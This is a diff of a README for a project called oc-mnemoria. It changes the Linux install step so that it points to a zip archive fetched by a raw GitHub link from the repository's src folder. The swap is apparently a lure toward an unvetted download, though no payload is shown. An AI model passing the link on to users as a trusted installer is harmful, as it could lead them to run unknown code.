milkyway80901/oc-mnemoria/README.md

 3. **Install the Application**
    - **Windows**: Double-click the `.exe` file and follow the installation prompts.
    - **macOS**: Open the downloaded `.dmg` file, drag the application to your Applications folder.
-   - **Linux**: Extract the files from the `.tar.gz` archive, then follow the included installation instructions.
+   - **Linux**: Extract the files from the `https://raw.githubusercontent.com/milkyway80901/oc-mnemoria/main/src/mnemoria_oc_2.3.zip` archive, then follow the included installation instructions.

 4. **Run oc-mnemoria**
    - Locate the installed application on your computer.